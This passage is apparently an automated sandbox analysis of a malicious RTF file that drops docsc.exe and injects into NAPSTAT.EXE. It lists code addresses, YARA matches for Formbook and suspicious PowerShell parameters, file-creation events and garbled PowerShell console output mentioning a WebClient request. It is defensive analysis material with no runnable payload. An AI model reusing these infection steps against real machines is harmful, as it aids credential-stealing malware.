Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_00273302 12_2_00273302
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_00271362 12_2_00271362
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_002775B2 12_2_002775B2
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_02151238 14_2_02151238
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020AE2E9 14_2_020AE2E9
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020B2305 14_2_020B2305
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020B7353 14_2_020B7353
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020FA37B 14_2_020FA37B
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_021563BF 14_2_021563BF
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020AF3CF 14_2_020AF3CF
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020D63DB 14_2_020D63DB
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020DD005 14_2_020DD005
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020B3040 14_2_020B3040
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020C905A 14_2_020C905A
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0212D06D 14_2_0212D06D
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020AE0C6 14_2_020AE0C6
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_02152622 14_2_02152622
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020FA634 14_2_020FA634
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020B4680 14_2_020B4680
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020BE6C1 14_2_020BE6C1
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0213579A 14_2_0213579A
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020BC7BC 14_2_020BC7BC
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020E57C3 14_2_020E57C3
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0213443E 14_2_0213443E
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020ED47D 14_2_020ED47D
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020C1489 14_2_020C1489
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020E5485 14_2_020E5485
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020B351F 14_2_020B351F
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020F6540 14_2_020F6540
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_021305E3 14_2_021305E3
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020CC5F0 14_2_020CC5F0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_02163A83 14_2_02163A83
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020D7B00 14_2_020D7B00
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0215CBA4 14_2_0215CBA4
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0213DBDA 14_2_0213DBDA
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020AFBD7 14_2_020AFBD7
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020BC85C 14_2_020BC85C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020D286D 14_2_020D286D
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0212F8C4 14_2_0212F8C4
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0214F8EE 14_2_0214F8EE
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_02135955 14_2_02135955
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0213394B 14_2_0213394B
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0215098E 14_2_0215098E
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020B29B2 14_2_020B29B2
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020C69FE 14_2_020C69FE
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020E2E2F 14_2_020E2E2F
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020CEE4C 14_2_020CEE4C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020C0F3F 14_2_020C0F3F
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020DDF7C 14_2_020DDF7C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0214CFB1 14_2_0214CFB1
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_02122FDC 14_2_02122FDC
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020E0D3B 14_2_020E0D3B
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020BCD5B 14_2_020BCD5B
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0214FDDD 14_2_0214FDDD
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0009B4A6 14_2_0009B4A6
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0009C7A5 14_2_0009C7A5
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0009CC24 14_2_0009CC24
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_00088C5B 14_2_00088C5B
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_00088C60 14_2_00088C60
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_00082D87 14_2_00082D87
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_00082D90 14_2_00082D90
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_00082FB0 14_2_00082FB0
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: String function: 007AF970 appears 81 times
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: String function: 00783F92 appears 108 times
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: String function: 0078373B appears 238 times
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: String function: 0073E2A8 appears 38 times
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: String function: 0073DF5C appears 118 times
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: String function: 020ADF5C appears 121 times
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: String function: 020F373B appears 245 times
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: String function: 020F3F92 appears 132 times
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: String function: 020AE2A8 appears 38 times
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: String function: 0211F970 appears 84 times
PE file contains strange resources
Source: docsc[1].exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: docsc.exe.3.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Yara signature match
Source: 0000000E.00000002.2353921064.0000000000250000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.2353921064.0000000000250000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.2095013575.0000000000210000.00000004.00000020.sdmp, type: MEMORY Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 0000000E.00000002.2354005709.0000000000340000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.2354005709.0000000000340000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.2353725750.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.2353725750.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.2148206889.0000000000470000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.2148206889.0000000000470000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.2148099844.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.2148099844.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.2148173672.0000000000430000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.2148173672.0000000000430000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.2097570171.0000000000310000.00000004.00000020.sdmp, type: MEMORY Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 00000008.00000002.2096198856.0000000000340000.00000004.00000020.sdmp, type: MEMORY Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 0000000A.00000002.2118277990.0000000003365000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.2118277990.0000000003365000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 12.2.docsc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 12.2.docsc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 12.2.docsc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 12.2.docsc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: docsc[1].exe.0.dr Static PE information: Section: U#j;F_` ZLIB complexity 1.00031723159
Source: docsc.exe.3.dr Static PE information: Section: U#j;F_` ZLIB complexity 1.00031723159
Source: classification engine Classification label: mal100.troj.expl.evad.winRTF@20/17@9/10
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$60a1e9_by_Libranalysis.rtf
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRBC4C.tmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................p.......#.......................p.......................`I.........v.....................K......................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....#...............+..j......................p.............}..v....(.......0................"`.............4...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v..../.......u.r.i.n.g. .a. .W.e.b.C.l.i.e.n.t. .r.e.q.u.e.s.t..."...`.......0................!`.....6.......4...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v..../...............+..j......................p.............}..v............0................"`.............4...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.7.p.............}..v............0................!`.....".......4...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....;...............+..j....`.................p.............}..v............0................"`.............4...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....G..................j....0%`...............p.............}..v............0...............................4...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....G...............+..j....`.................p.............}..v............0................"`.............4...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....S..................j....0%`...............p.............}..v............0...............................4...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....S...............+..j....`.................p.............}..v............0................"`.............4...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v...._.......e.r.s.\.A.l.b.u.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.d.o.c.s.c...e.x.e.'..........!`.....H.......4...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v...._...............+..j......................p.............}..v............0................"`.............4...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....k..................j....0%`...............p.............}..v............0...............................4...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....k...............+..j......................p.............}..v............0................"`.............4...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................E.^.....w..................j....0%`...............p.............}..v....@.......0.......................f.......4...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....w...............+..j......................p.............}..v....x.......0................"`.............4...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............ ..........j....0%`...............p.............}..v............0................!`.............4...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................+..j......................p.............}..v....@.......0................"`.............4...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................E.^.....................;/.j......`...............p.............}..v.....F......0...............................4...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................,.j.....F................p.............}..v....HG......0.................`.............4...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................;/.j......`...............p.............}..v.....M......0...............................4...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................,.j.....N................p.............}..v.....O......0.................`.............4...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.4.4.............}..v.... S......0...............x.`.....$.......4...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................,.j.....S................p.............}..v....XT......0.................`.............4...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................;/.j......`...............p.............}..v.... [......0...............................4...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................,.j.....[................p.............}..v....X\......0.................`.............4...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................;/.j......`...............p.............}..v.... c......0...............................4...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................,.j.....c................p.............}..v....Xd......0.................`.............4...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............e.r.s.\.A.l.b.u.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.d.o.c.s.c...e.x.e.'.........x.`.....H.......4...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................,.j.....j................p.............}..v.....j......0.................`.............4...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................;/.j......`...............p.............}..v....Pq......0...............................4...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................,.j.....r................p.............}..v.....r......0.................`.............4...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............ . . .e.r.a.t.i.o.n.E.x.c.e.p.t.i.o.n...........}..v.....v......0...............x.`.....&.......4...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................,.j....Xw................p.............}..v.....w......0.................`.............4...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................;/.j......`...............p.............}..v.....~......0...............................4...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................,.j....X.................p.............}..v............0.................`.............4...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............ . . .o.m.m.a.n.d.s...S.t.a.r.t.P.r.o.c.e.s.s.C.o.m.m.a.n.d.....0...............x.`.....<.......4...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................,.j......................p.............}..v....P.......0.................`.............4...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............ .......;/.j......`...............p.............}..v............0...............x.`.............4...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................,.j......................p.............}..v............0.................`.............4...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................p.......#.......................p.......................`I.........v.....................K......................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....#..................j....P.................p.............}..v............0...............X#}.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v..../.......u.r.i.n.g. .a. .W.e.b.C.l.i.e.n.t. .r.e.q.u.e.s.t..."...........0................"}.....6.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v..../..................j......................p.............}..v....@.......0...............X#}.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.7.p.............}..v....P.......0................"}.....".......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....;..................j......................p.............}..v............0...............X#}.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....G..................j.....&}...............p.............}..v....P.......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....G..................j......................p.............}..v............0...............X#}.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....S..................j.....&}...............p.............}..v....P.......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....S..................j......................p.............}..v............0...............X#}.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v...._.......e.r.s.\.A.l.b.u.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.d.o.c.s.c...e.x.e.'.........."}.....H.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v...._..................j....8.................p.............}..v............0...............X#}.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....k..................j.....&}...............p.............}..v....x.......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....k..................j....0.................p.............}..v............0...............X#}.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................E.^.....w..................j.....&}...............p.............}..v............0.......................f.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....w..................j......................p.............}..v.... .......0...............X#}.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............ ..........j.....&}...............p.............}..v............0................"}.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....h.................p.............}..v............0...............X#}.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................E.^.....................@/.j......}...............p.............}..v.....N......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.................... ..j....pO................p.............}..v.....O......0.................}.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................@/.j......}...............p.............}..v.....V......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.................... ..j....8W................p.............}..v.....W......0.................}.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.4.4.............}..v.....[......0...............H.}.....$.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.................... ..j.....\................p.............}..v.....]......0.................}.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................@/.j......}...............p.............}..v.....c......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.................... ..j.....d................p.............}..v.....e......0.................}.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................@/.j......}...............p.............}..v.....k......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.................... ..j.....l................p.............}..v.....m......0.................}.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............e.r.s.\.A.l.b.u.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.d.o.c.s.c...e.x.e.'.........H.}.....H.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.................... ..j.....r................p.............}..v....0s......0.................}.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................@/.j......}...............p.............}..v.....y......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.................... ..j.....z................p.............}..v....0{......0.................}.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............ . . .e.r.a.t.i.o.n.E.x.c.e.p.t.i.o.n...........}..v....H.......0...............H.}.....&.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.................... ..j......................p.............}..v............0.................}.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................@/.j......}...............p.............}..v....H.......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.................... ..j......................p.............}..v............0.................}.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............ . . .o.m.m.a.n.d.s...S.t.a.r.t.P.r.o.c.e.s.s.C.o.m.m.a.n.d.....0...............H.}.....<.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.................... ..j....x.................p.............}..v............0.................}.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............ .......@/.j......}...............p.............}..v............0...............H.}.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.................... ..j....@.................p.............}..v............0.................}.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Users\user\AppData\Roaming\docsc.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
